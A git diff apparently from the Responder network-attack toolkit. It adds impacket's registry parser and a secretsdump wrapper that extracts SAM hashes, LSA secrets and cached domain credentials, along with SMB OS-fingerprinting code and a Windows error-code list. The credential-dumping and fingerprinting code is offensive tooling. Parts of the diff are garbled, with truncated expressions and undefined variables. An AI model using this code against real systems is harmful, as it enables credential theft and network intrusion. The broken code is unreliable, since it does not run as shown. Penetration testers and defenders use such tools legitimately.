+ERROR_SMI_PRIMITIVE_INSTALLER_FAILED = 0x0000371c
+ERROR_GENERIC_COMMAND_FAILED = 0x0000371d
+ERROR_SXS_FILE_HASH_MISSING = 0x0000371e
+ERROR_EVT_INVALID_CHANNEL_PATH = 0x00003a98
+ERROR_EVT_INVALID_QUERY = 0x00003a99
+ERROR_EVT_PUBLISHER_METADATA_NOT_FOUND = 0x00003a9a
+ERROR_EVT_EVENT_TEMPLATE_NOT_FOUND = 0x00003a9b
+ERROR_EVT_INVALID_PUBLISHER_NAME = 0x00003a9c
+ERROR_EVT_INVALID_EVENT_DATA = 0x00003a9d
+ERROR_EVT_CHANNEL_NOT_FOUND = 0x00003a9f
+ERROR_EVT_MALFORMED_XML_TEXT = 0x00003aa0
+ERROR_EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x00003aa1
+ERROR_EVT_CONFIGURATION_ERROR = 0x00003aa2
+ERROR_EVT_QUERY_RESULT_STALE = 0x00003aa3
+ERROR_EVT_QUERY_RESULT_INVALID_POSITION = 0x00003aa4
+ERROR_EVT_NON_VALIDATING_MSXML = 0x00003aa5
+ERROR_EVT_FILTER_ALREADYSCOPED = 0x00003aa6
+ERROR_EVT_FILTER_NOTELTSET = 0x00003aa7
+ERROR_EVT_FILTER_INVARG = 0x00003aa8
+ERROR_EVT_FILTER_INVTEST = 0x00003aa9
+ERROR_EVT_FILTER_INVTYPE = 0x00003aaa
+ERROR_EVT_FILTER_PARSEERR = 0x00003aab
+ERROR_EVT_FILTER_UNSUPPORTEDOP = 0x00003aac
+ERROR_EVT_FILTER_UNEXPECTEDTOKEN = 0x00003aad
+ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x00003aae
+ERROR_EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x00003aaf
+ERROR_EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x00003ab0
+ERROR_EVT_CHANNEL_CANNOT_ACTIVATE = 0x00003ab1
+ERROR_EVT_FILTER_TOO_COMPLEX = 0x00003ab2
+ERROR_EVT_MESSAGE_NOT_FOUND = 0x00003ab3
+ERROR_EVT_MESSAGE_ID_NOT_FOUND = 0x00003ab4
+ERROR_EVT_UNRESOLVED_VALUE_INSERT = 0x00003ab5
+ERROR_EVT_UNRESOLVED_PARAMETER_INSERT = 0x00003ab6
+ERROR_EVT_MAX_INSERTS_REACHED = 0x00003ab7
+ERROR_EVT_EVENT_DEFINITION_NOT_FOUND = 0x00003ab8
+ERROR_EVT_MESSAGE_LOCALE_NOT_FOUND = 0x00003ab9
+ERROR_EVT_VERSION_TOO_OLD = 0x00003aba
+ERROR_EVT_VERSION_TOO_NEW = 0x00003abb
+ERROR_EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x00003abc
+ERROR_EVT_PUBLISHER_DISABLED = 0x00003abd
+ERROR_EVT_FILTER_OUT_OF_RANGE = 0x00003abe
+ERROR_EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x00003ae8
+ERROR_EC_LOG_DISABLED = 0x00003ae9
+ERROR_EC_CIRCULAR_FORWARDING = 0x00003aea
+ERROR_EC_CREDSTORE_FULL = 0x00003aeb
+ERROR_EC_CRED_NOT_FOUND = 0x00003aec
+ERROR_EC_NO_ACTIVE_CHANNEL = 0x00003aed
+ERROR_MUI_FILE_NOT_FOUND = 0x00003afc
+ERROR_MUI_INVALID_FILE = 0x00003afd
+ERROR_MUI_INVALID_RC_CONFIG = 0x00003afe
+ERROR_MUI_INVALID_LOCALE_NAME = 0x00003aff
+ERROR_MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x00003b00
+ERROR_MUI_FILE_NOT_LOADED = 0x00003b01
+ERROR_RESOURCE_ENUM_USER_STOP = 0x00003b02
+ERROR_MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x00003b03
+ERROR_MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x00003b04
+ERROR_MRM_RUNTIME_NO_DEFAULT_OR_NEUTRAL_RESOURCE = 0x00003b06
+ERROR_MRM_INVALID_PRICONFIG = 0x00003b07
+ERROR_MRM_INVALID_FILE_TYPE = 0x00003b08
+ERROR_MRM_UNKNOWN_QUALIFIER = 0x00003b09
+ERROR_MRM_INVALID_QUALIFIER_VALUE = 0x00003b0a
+ERROR_MRM_NO_CANDIDATE = 0x00003b0b
+ERROR_MRM_NO_MATCH_OR_DEFAULT_CANDIDATE = 0x00003b0c
+ERROR_MRM_RESOURCE_TYPE_MISMATCH = 0x00003b0d
+ERROR_MRM_DUPLICATE_MAP_NAME = 0x00003b0e
+ERROR_MRM_DUPLICATE_ENTRY = 0x00003b0f
+ERROR_MRM_INVALID_RESOURCE_IDENTIFIER = 0x00003b10
+ERROR_MRM_FILEPATH_TOO_LONG = 0x00003b11
+ERROR_MRM_UNSUPPORTED_DIRECTORY_TYPE = 0x00003b12
+ERROR_MRM_INVALID_PRI_FILE = 0x00003b16
+ERROR_MRM_NAMED_RESOURCE_NOT_FOUND = 0x00003b17
+ERROR_MRM_MAP_NOT_FOUND = 0x00003b1f
+ERROR_MRM_UNSUPPORTED_PROFILE_TYPE = 0x00003b20
+ERROR_MRM_INVALID_QUALIFIER_OPERATOR = 0x00003b21
+ERROR_MRM_INDETERMINATE_QUALIFIER_VALUE = 0x00003b22
+ERROR_MRM_AUTOMERGE_ENABLED = 0x00003b23
+ERROR_MRM_TOO_MANY_RESOURCES = 0x00003b24
+ERROR_MCA_INVALID_CAPABILITIES_STRING = 0x00003b60
+ERROR_MCA_INVALID_VCP_VERSION = 0x00003b61
+ERROR_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x00003b62
+ERROR_MCA_MCCS_VERSION_MISMATCH = 0x00003b63
+ERROR_MCA_UNSUPPORTED_MCCS_VERSION = 0x00003b64
+ERROR_MCA_INTERNAL_ERROR = 0x00003b65
+ERROR_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x00003b66
+ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x00003b67
+ERROR_AMBIGUOUS_SYSTEM_DEVICE = 0x00003b92
+ERROR_SYSTEM_DEVICE_NOT_FOUND = 0x00003bc3
+ERROR_HASH_NOT_SUPPORTED = 0x00003bc4
+ERROR_HASH_NOT_PRESENT = 0x00003bc5
+ERROR_SECONDARY_IC_PROVIDER_NOT_REGISTERED = 0x00003bd9
+ERROR_GPIO_CLIENT_INFORMATION_INVALID = 0x00003bda
+ERROR_GPIO_VERSION_NOT_SUPPORTED = 0x00003bdb
+ERROR_GPIO_INVALID_REGISTRATION_PACKET = 0x00003bdc
+ERROR_GPIO_OPERATION_DENIED = 0x00003bdd
+ERROR_GPIO_INCOMPATIBLE_CONNECT_MODE = 0x00003bde
+ERROR_GPIO_INTERRUPT_ALREADY_UNMASKED = 0x00003bdf
+ERROR_CANNOT_SWITCH_RUNLEVEL = 0x00003c28
+ERROR_INVALID_RUNLEVEL_SETTING = 0x00003c29
+ERROR_RUNLEVEL_SWITCH_TIMEOUT = 0x00003c2a
+ERROR_RUNLEVEL_SWITCH_AGENT_TIMEOUT = 0x00003c2b
+ERROR_RUNLEVEL_SWITCH_IN_PROGRESS = 0x00003c2c
+ERROR_SERVICES_FAILED_AUTOSTART = 0x00003c2d
+ERROR_COM_TASK_STOP_PENDING = 0x00003c8d
+ERROR_INSTALL_OPEN_PACKAGE_FAILED = 0x00003cf0
+ERROR_INSTALL_PACKAGE_NOT_FOUND = 0x00003cf1
+ERROR_INSTALL_INVALID_PACKAGE = 0x00003cf2
+ERROR_INSTALL_RESOLVE_DEPENDENCY_FAILED = 0x00003cf3
+ERROR_INSTALL_OUT_OF_DISK_SPACE = 0x00003cf4
+ERROR_INSTALL_NETWORK_FAILURE = 0x00003cf5
+ERROR_INSTALL_REGISTRATION_FAILURE = 0x00003cf6
+ERROR_INSTALL_DEREGISTRATION_FAILURE = 0x00003cf7
+ERROR_INSTALL_CANCEL = 0x00003cf8
+ERROR_INSTALL_FAILED = 0x00003cf9
+ERROR_REMOVE_FAILED = 0x00003cfa
+ERROR_PACKAGE_ALREADY_EXISTS = 0x00003cfb
+ERROR_NEEDS_REMEDIATION = 0x00003cfc
+ERROR_INSTALL_PREREQUISITE_FAILED = 0x00003cfd
+ERROR_PACKAGE_REPOSITORY_CORRUPTED = 0x00003cfe
+ERROR_INSTALL_POLICY_FAILURE = 0x00003cff
+ERROR_PACKAGE_UPDATING = 0x00003d00
+ERROR_DEPLOYMENT_BLOCKED_BY_POLICY = 0x00003d01
+ERROR_PACKAGES_IN_USE = 0x00003d02
+ERROR_RECOVERY_FILE_CORRUPT = 0x00003d03
+ERROR_INVALID_STAGED_SIGNATURE = 0x00003d04
+ERROR_DELETING_EXISTING_APPLICATIONDATA_STORE_FAILED = 0x00003d05
+ERROR_INSTALL_PACKAGE_DOWNGRADE = 0x00003d06
+ERROR_SYSTEM_NEEDS_REMEDIATION = 0x00003d07
+ERROR_APPX_INTEGRITY_FAILURE_CLR_NGEN = 0x00003d08
+ERROR_RESILIENCY_FILE_CORRUPT = 0x00003d09
+ERROR_INSTALL_FIREWALL_SERVICE_NOT_RUNNING = 0x00003d0a
+APPMODEL_ERROR_NO_PACKAGE = 0x00003d54
+APPMODEL_ERROR_PACKAGE_RUNTIME_CORRUPT = 0x00003d55
+APPMODEL_ERROR_PACKAGE_IDENTITY_CORRUPT = 0x00003d56
+APPMODEL_ERROR_NO_APPLICATION = 0x00003d57
+ERROR_STATE_LOAD_STORE_FAILED = 0x00003db8
+ERROR_STATE_GET_VERSION_FAILED = 0x00003db9
+ERROR_STATE_SET_VERSION_FAILED = 0x00003dba
+ERROR_STATE_STRUCTURED_RESET_FAILED = 0x00003dbb
+ERROR_STATE_OPEN_CONTAINER_FAILED = 0x00003dbc
+ERROR_STATE_CREATE_CONTAINER_FAILED = 0x00003dbd
+ERROR_STATE_DELETE_CONTAINER_FAILED = 0x00003dbe
+ERROR_STATE_READ_SETTING_FAILED = 0x00003dbf
+ERROR_STATE_WRITE_SETTING_FAILED = 0x00003dc0
+ERROR_STATE_DELETE_SETTING_FAILED = 0x00003dc1
+ERROR_STATE_QUERY_SETTING_FAILED = 0x00003dc2
+ERROR_STATE_READ_COMPOSITE_SETTING_FAILED = 0x00003dc3
+ERROR_STATE_WRITE_COMPOSITE_SETTING_FAILED = 0x00003dc4
+ERROR_STATE_ENUMERATE_CONTAINER_FAILED = 0x00003dc5
+ERROR_STATE_ENUMERATE_SETTINGS_FAILED = 0x00003dc6
+ERROR_STATE_COMPOSITE_SETTING_VALUE_SIZE_LIMIT_EXCEEDED = 0x00003dc7
+ERROR_STATE_SETTING_VALUE_SIZE_LIMIT_EXCEEDED = 0x00003dc8
+ERROR_STATE_SETTING_NAME_SIZE_LIMIT_EXCEEDED = 0x00003dc9
+ERROR_STATE_CONTAINER_NAME_SIZE_LIMIT_EXCEEDED = 0x00003dca
+ERROR_API_UNAVAILABLE = 0x00003de1
+STORE_ERROR_UNLICENSED = 0x00003df5
+STORE_ERROR_UNLICENSED_USER = 0x00003df6
diff --git a/tools/MultiRelay/impacket-dev/impacket/uuid.py b/tools/MultiRelay/impacket-dev/impacket/uuid.py
new file mode 100644
index 0000000..2aa3310
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/uuid.py
@@ -0,0 +1,79 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+# Generate UUID compliant with http://www.webdav.org/specs/draft-leach-uuids-guids-01.txt.
+# A different, much simpler (not necessarily better) algorithm is used.
+#
+# Author:
+# Javier Kohen (jkohen)
+#
+from __future__ import absolute_import
+from __future__ import print_function
+import re
+import binascii
+
+from random import randrange
+from struct import pack, unpack
+
+EMPTY_UUID = b'\x00'*16
+
+def generate():
+ # UHm... crappy Python has an maximum integer of 2**31-1.
+ top = (1<<31)-1
+ return pack("IIII", randrange(top), randrange(top), randrange(top), randrange(top))
+
+def bin_to_string(uuid):
+ uuid1, uuid2, uuid3 = unpack('HHL', uuid[8:16])
+ return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6)
+
+def string_to_bin(uuid):
+ # If a UUID in the 00000000000000000000000000000000 format, let's return bytes as is
+ if '-' not in uuid:
+ return binascii.unhexlify(uuid)
+
+ # If a UUID in the 00000000-0000-0000-0000-000000000000 format, parse it as Variant 2 UUID
+ # The first three components of the UUID are little-endian, and the last two are big-endian
+ matches = re.match('([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})', uuid)
+ (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = [int(x, 16) for x in matches.groups()]
+ uuid = pack('HHL', uuid4, uuid5, uuid6)
+ return uuid
+
+def stringver_to_bin(s):
+ (maj,min) = s.split('.')
+ return pack(' 5:
+ LOG.warning("Unsupported version (%d.%d) - things might not work!" % (self.__regf['MajorVersion'], self.__regf['MinorVersion']))
+
+ def close(self):
+ self.fd.close()
+
+ def __del__(self):
+ self.close()
+
+ def __findRootKey(self):
+ self.fd.seek(0,0)
+ data = self.fd.read(4096)
+ while len(data) > 0:
+ try:
+ hbin = REG_HBIN(data[:0x20])
+ # Read the remaining bytes for this hbin
+ data += self.fd.read(hbin['OffsetNextHBin']-4096)
+ data = data[0x20:]
+ blocks = self.__processDataBlocks(data)
+ for block in blocks:
+ if isinstance(block, REG_NK):
+ if block['Type'] == ROOT_KEY:
+ return block
+ except Exception as e:
+ pass
+ data = self.fd.read(4096)
+
+ return None
+
+
+ def __getBlock(self, offset):
+ self.fd.seek(4096+offset,0)
+ sizeBytes = self.fd.read(4)
+ data = sizeBytes + self.fd.read(unpack(' 0:
+ block = self.__getBlock(valueOffset)
+ res.append(block)
+ return res
+
+ def __getData(self, offset, count):
+ self.fd.seek(4096+offset, 0)
+ return self.fd.read(count)[4:]
+
+ def __processDataBlocks(self,data):
+ res = []
+ while len(data) > 0:
+ #blockSize = unpack(' 0:
+ tmpList = list(block.structure)
+ tmpList[1] = ('_Data','_-Data','self["DataBlockSize"]-4')
+ block.structure = tuple(tmpList)
+
+ block.fromString(data)
+ blockLen = len(block)
+
+ if block['Data'][:2] in StructMappings:
+ block = StructMappings[block['Data'][:2]](block['Data'])
+
+ res.append(block)
+ data = data[blockLen:]
+ return res
+
+ def __getValueData(self, rec):
+ # We should receive a VK record
+ if rec['DataLen'] == 0:
+ return ''
+ if rec['DataLen'] < 0:
+ # if DataLen < 5 the value itself is stored in the Offset field
+ return rec['OffsetData']
+ else:
+ return self.__getData(rec['OffsetData'], rec['DataLen']+4)
+
+ def __getLhHash(self, key):
+ res = 0
+ for bb in key.upper():
+ res *= 37
+ res += ord(bb)
+ return res % 0x100000000
+
+ def __compareHash(self, magic, hashData, key):
+ if magic == 'lf':
+ hashRec = REG_HASH(hashData)
+ if hashRec['KeyName'].strip(b'\x00') == b(key[:4]):
+ return hashRec['OffsetNk']
+ elif magic == 'lh':
+ hashRec = REG_HASH(hashData)
+ if unpack(' 1:
+ key = key[1:]
+
+ parentKey = self.rootKey
+ if len(key) > 0 and key[0]!='\\':
+ for subKey in key.split('\\'):
+ res = self.__findSubKey(parentKey, subKey)
+ if res is not None:
+ parentKey = res
+ else:
+ #LOG.error("Key %s not found!" % key)
+ return None
+
+ return parentKey
+
+ def printValue(self, valueType, valueData):
+ if valueType == REG_SZ or valueType == REG_EXPAND_SZ:
+ if type(valueData) is int:
+ print('NULL')
+ else:
+ print("%s" % (valueData.decode('utf-16le')))
+ elif valueType == REG_BINARY:
+ print('')
+ hexdump(valueData, self.indent)
+ elif valueType == REG_DWORD:
+ print("%d" % valueData)
+ elif valueType == REG_QWORD:
+ print("%d" % (unpack(' 1:
+ print('')
+ hexdump(valueData, self.indent)
+ else:
+ print(" NULL")
+ except:
+ print(" NULL")
+ elif valueType == REG_MULTISZ:
+ print("%s" % (valueData.decode('utf-16le')))
+ else:
+ print("Unknown Type 0x%x!" % valueType)
+ hexdump(valueData)
+
+ def enumKey(self, parentKey):
+ res = []
+ # If we're here.. we have a valid NK record for the key
+ # Now let's searcht the subkeys
+ if parentKey['NumSubKeys'] > 0:
+ lf = self.__getBlock(parentKey['OffsetSubKeyLf'])
+ data = lf['HashRecords']
+
+ if lf['Magic'] == 'ri':
+ # ri points to lf/lh records, so we must parse them before
+ records = ''
+ for i in range(lf['NumKeys']):
+ offset = unpack(' 0:
+ valueList = self.__getValueBlocks(key['OffsetValueList'], key['NumValues']+1)
+
+ for value in valueList:
+ if value['Flag'] > 0:
+ resp.append(value['Name'])
+ else:
+ resp.append(b'default')
+
+ return resp
+
+ def getValue(self, keyValue):
+ # returns a tuple with (ValueType, ValueData) for the requested keyValue
+ regKey = ntpath.dirname(keyValue)
+ regValue = ntpath.basename(keyValue)
+
+ key = self.findKey(regKey)
+
+ if key is None:
+ return None
+
+ if key['NumValues'] > 0:
+ valueList = self.__getValueBlocks(key['OffsetValueList'], key['NumValues']+1)
+
+ for value in valueList:
+ if value['Name'] == b(regValue):
+ return value['ValueType'], self.__getValueData(value)
+ elif regValue == 'default' and value['Flag'] <=0:
+ return value['ValueType'], self.__getValueData(value)
+
+ return None
+
+ def getClass(self, className):
+
+ key = self.findKey(className)
+
+ if key is None:
+ return None
+
+ #print key.dump()
+ if key['OffsetClassName'] > 0:
+ value = self.__getBlock(key['OffsetClassName'])
+ return value['Data']
diff --git a/tools/MultiRelay/impacket-dev/secretsdump.py b/tools/MultiRelay/impacket-dev/secretsdump.py
new file mode 100755
index 0000000..35e3a0b
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/secretsdump.py
@@ -0,0 +1,186 @@
+#!/usr/bin/env python
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description: Performs various techniques to dump hashes from the
+# remote machine without executing any agent there.
+# For SAM and LSA Secrets (including cached creds)
+# we try to read as much as we can from the registry
+# and then we save the hives in the target system
+# (%SYSTEMROOT%\\Temp dir) and read the rest of the
+# data from there.
+# For NTDS.dit we either:
+# a. Get the domain users list and get its hashes
+# and Kerberos keys using [MS-DRDS] DRSGetNCChanges()
+# call, replicating just the attributes we need.
+# b. Extract NTDS.dit via vssadmin executed with the
+# smbexec approach.
+# It's copied on the temp dir and parsed remotely.
+#
+# The script initiates the services required for its working
+# if they are not available (e.g. Remote Registry, even if it is
+# disabled). After the work is done, things are restored to the
+# original state.
+#
+# Author:
+# Alberto Solino (@agsolino)
+#
+# References: Most of the work done by these guys. I just put all
+# the pieces together, plus some extra magic.
+#
+# https://github.com/gentilkiwi/kekeo/tree/master/dcsync
+# https://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
+# https://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
+# https://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
+# https://web.archive.org/web/20130901115208/www.quarkslab.com/en-blog+read+13
+# https://code.google.com/p/creddump/
+# https://lab.mediaservice.net/code/cachedump.rb
+# https://insecurety.net/?p=768
+# http://www.beginningtoseethelight.org/ntsecurity/index.htm
+# https://www.exploit-db.com/docs/english/18244-active-domain-offline-hash-dump-&-forensic-analysis.pdf
+# https://www.passcape.com/index.php?section=blog&cmd=details&id=15
+#
+from __future__ import division
+from __future__ import print_function
+import argparse
+import codecs
+import logging
+import os
+import sys
+
+from impacket import version
+from impacket.examples import logger
+from impacket.examples.secretsdump import LocalOperations, SAMHashes, LSASecrets, NTDSHashes
+
+try:
+ input = raw_input
+except NameError:
+ pass
+
+class DumpSecrets:
+ def __init__(self, remoteName, username='', password='', domain='', options=None):
+ self.__useVSSMethod = False
+ self.__remoteName = 'LOCAL'
+ self.__remoteHost = 'LOCAL'
+ self.__username = None
+ self.__password = None
+ self.__domain = None
+ self.__lmhash = ''
+ self.__nthash = ''
+ self.__aesKey = None
+ self.__smbConnection = None
+ self.__remoteOps = None
+ self.__SAMHashes = None
+ self.__NTDSHashes = None
+ self.__LSASecrets = None
+ self.__systemHive = None
+ self.__bootkey = None
+ self.__securityHive = None
+ self.__samHive = None
+ self.__ntdsFile = None
+ self.__history = None
+ self.__noLMHash = True
+ self.__isRemote = False
+ self.__outputFileName = None
+ self.__doKerberos = None
+ self.__justDC = False
+ self.__justDCNTLM = False
+ self.__justUser = None
+ self.__pwdLastSet = None
+ self.__printUserStatus= None
+ self.__resumeFileName = None
+ self.__canProcessSAMLSA = True
+ self.__kdcHost = None
+ self.__options = options
+
+
+ def dump(self, sam, security, system, outfile):
+ #Give proper credit.
+ print(version.BANNER)
+ #Start logger.
+ #logger.init(False)
+ logging.getLogger().setLevel(logging.INFO)
+ self.__outputFileName = outfile
+ # We only do local dumping, so sam, security, system.
+ try:
+ if self.__remoteName.upper() == 'LOCAL' and self.__username == None:
+ self.__isRemote = False
+ self.__useVSSMethod = True
+ localOperations = LocalOperations(system)
+ bootKey = localOperations.getBootKey()
+
+ if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
+ try:
+ if self.__isRemote is True:
+ SAMFileName = self.__remoteOps.saveSAM()
+ else:
+ SAMFileName = sam
+
+ self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
+ self.__SAMHashes.dump()
+ if self.__outputFileName is not None:
+ self.__SAMHashes.export(self.__outputFileName)
+ except Exception as e:
+ logging.error('SAM hashes extraction failed: %s' % str(e))
+
+ try:
+ if self.__isRemote is True:
+ SECURITYFileName = self.__remoteOps.saveSECURITY()
+ else:
+ SECURITYFileName = security
+
+ self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps,
+ isRemote=self.__isRemote, history=self.__history)
+ self.__LSASecrets.dumpCachedHashes()
+ if self.__outputFileName is not None:
+ self.__LSASecrets.exportCached(self.__outputFileName)
+ self.__LSASecrets.dumpSecrets()
+ if self.__outputFileName is not None:
+ self.__LSASecrets.exportSecrets(self.__outputFileName)
+ except Exception as e:
+ if logging.getLogger().level == logging.DEBUG:
+ import traceback
+ traceback.print_exc()
+ logging.error('LSA hashes extraction failed: %s' % str(e))
+
+
+ except (Exception, KeyboardInterrupt) as e:
+ if logging.getLogger().level == logging.DEBUG:
+ import traceback
+ traceback.print_exc()
+ logging.error(e)
+ if self.__NTDSHashes is not None:
+ if isinstance(e, KeyboardInterrupt):
+ while True:
+ answer = input("Delete resume session file? [y/N] ")
+ if answer.upper() == '':
+ answer = 'N'
+ break
+ elif answer.upper() == 'Y':
+ answer = 'Y'
+ break
+ elif answer.upper() == 'N':
+ answer = 'N'
+ break
+ if answer == 'Y':
+ resumeFile = self.__NTDSHashes.getResumeSessionFile()
+ if resumeFile is not None:
+ os.unlink(resumeFile)
+ try:
+ self.cleanup()
+ except:
+ pass
+
+ def cleanup(self):
+ logging.info('Cleaning up... ')
+ if self.__remoteOps:
+ self.__remoteOps.finish()
+ if self.__SAMHashes:
+ self.__SAMHashes.finish()
+ if self.__LSASecrets:
+ self.__LSASecrets.finish()
+ if self.__NTDSHashes:
+ self.__NTDSHashes.finish()
diff --git a/tools/MultiRelay/odict.py b/tools/MultiRelay/odict.py
new file mode 100644
index 0000000..107cb01
--- /dev/null
+++ b/tools/MultiRelay/odict.py
@@ -0,0 +1,121 @@
+import sys
+try:
+ from UserDict import DictMixin
+except ImportError:
+ from collections import UserDict
+ from collections import MutableMapping as DictMixin
+
+class OrderedDict(dict, DictMixin):
+
+ def __init__(self, *args, **kwds):
+ if len(args) > 1:
+ raise TypeError('expected at most 1 arguments, got %d' % len(args))
+ try:
+ self.__end
+ except AttributeError:
+ self.clear()
+ self.update(*args, **kwds)
+
+ def clear(self):
+ self.__end = end = []
+ end += [None, end, end]
+ self.__map = {}
+ dict.clear(self)
+
+ def __setitem__(self, key, value):
+ if key not in self:
+ end = self.__end
+ curr = end[1]
+ curr[2] = end[1] = self.__map[key] = [key, curr, end]
+ dict.__setitem__(self, key, value)
+
+ def __delitem__(self, key):
+ dict.__delitem__(self, key)
+ key, prev, next = self.__map.pop(key)
+ prev[2] = next
+ next[1] = prev
+
+ def __iter__(self):
+ end = self.__end
+ curr = end[2]
+ while curr is not end:
+ yield curr[0]
+ curr = curr[2]
+
+ def __reversed__(self):
+ end = self.__end
+ curr = end[1]
+ while curr is not end:
+ yield curr[0]
+ curr = curr[1]
+
+ def popitem(self, last=True):
+ if not self:
+ raise KeyError('dictionary is empty')
+ if last:
+ key = next(reversed(self))
+ else:
+ key = next(iter(self))
+ value = self.pop(key)
+ return key, value
+
+ def __reduce__(self):
+ items = [[k, self[k]] for k in self]
+ tmp = self.__map, self.__end
+ del self.__map, self.__end
+ inst_dict = vars(self).copy()
+ self.__map, self.__end = tmp
+ if inst_dict:
+ return (self.__class__, (items,), inst_dict)
+ return self.__class__, (items,)
+
+ def keys(self):
+ return list(self)
+
+ if sys.version_info >= (3, 0):
+ setdefault = DictMixin.setdefault
+ update = DictMixin.update
+ pop = DictMixin.pop
+ values = DictMixin.values
+ items = DictMixin.items
+ iterkeys = DictMixin.keys
+ itervalues = DictMixin.values
+ iteritems = DictMixin.items
+ else:
+ setdefault = DictMixin.setdefault
+ update = DictMixin.update
+ pop = DictMixin.pop
+ values = DictMixin.values
+ items = DictMixin.items
+ iterkeys = DictMixin.iterkeys
+ itervalues = DictMixin.itervalues
+ iteritems = DictMixin.iteritems
+
+ def __repr__(self):
+ if not self:
+ return '%s()' % (self.__class__.__name__,)
+ return '%s(%r)' % (self.__class__.__name__, list(self.items()))
+
+ def copy(self):
+ return self.__class__(self)
+
+ @classmethod
+ def fromkeys(cls, iterable, value=None):
+ d = cls()
+ for key in iterable:
+ d[key] = value
+ return d
+
+ def __eq__(self, other):
+ if isinstance(other, OrderedDict):
+ return len(self)==len(other) and \
+ min(p==q for p, q in zip(list(self.items()), list(other.items())))
+ return dict.__eq__(self, other)
+
+ def __ne__(self, other):
+ return not self == other
+
+
+if __name__ == '__main__':
+ d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
+ assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']
diff --git a/tools/SMBFinger/Finger.py b/tools/SMBFinger/Finger.py
index 682b0c1..b779abb 100755
--- a/tools/SMBFinger/Finger.py
+++ b/tools/SMBFinger/Finger.py
@@ -1,5 +1,5 @@
#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools
+# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
@@ -18,7 +18,7 @@ import re,sys,socket,struct
import multiprocessing
from socket import *
from time import sleep
-from odict import OrderedDict
+from .odict import OrderedDict
__version__ = "0.7"
@@ -29,16 +29,44 @@ class Packet():
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
- for k,v in kw.items():
+ for k,v in list(kw.items()):
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
- return "".join(map(str, self.fields.values()))
+ return "".join(map(str, list(self.fields.values())))
+
+#Python version
+if (sys.version_info > (3, 0)):
+ PY2OR3 = "PY3"
+else:
+ PY2OR3 = "PY2"
+
+SMB1 = "Enabled"
+
+def StructWithLenPython2or3(endian,data):
+ #Python2...
+ if PY2OR3 is "PY2":
+ return struct.pack(endian, data)
+ #Python3...
+ else:
+ return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+ if PY2OR3 is "PY2":
+ return str(data)
+ else:
+ return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+ if PY2OR3 is "PY2":
+ return str(data)
+ else:
+ return str(data.decode('latin-1'))
def longueur(payload):
- length = struct.pack(">i", len(''.join(payload)))
+ length = StructWithLenPython2or3(">i", len(''.join(payload)))
return length
class SMBHeader(Packet):
@@ -63,9 +91,9 @@ class SMBNego(Packet):
("Bcc", "\x62\x00"),
("Data", "")
])
-
+
def calculate(self):
- self.fields["Bcc"] = struct.pack(" 255:
- OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
- return OsVersion, ClientVersion
- if length <= 255:
- OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
- return OsVersion, ClientVersion
- except:
- return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
+ try:
+ length = struct.unpack(' 255:
+ OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[47+length:].split('\x00\x00\x00')[:2]])
+ return OsVersion, ClientVersion
+ if length <= 255:
+ OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[46+length:].split('\x00\x00\x00')[:2]])
+ return OsVersion, ClientVersion
+ except:
+ return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
- try:
- DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
- #If max length domain name, there won't be a \x00\x00\x00 delineator to split on
- if Hostname == '':
- DomainJoined = data[81:110].replace('\x00','')
- Hostname = data[113:].replace('\x00','')
- return Hostname, DomainJoined
- except:
- return "Could not get Hostname.", "Could not get Domain joined"
+ try:
+ data = NetworkRecvBufferPython2or3(data)
+ DomainJoined, Hostname = tuple([e.replace("\x00", "") for e in data[81:].split('\x00\x00\x00')[:2]])
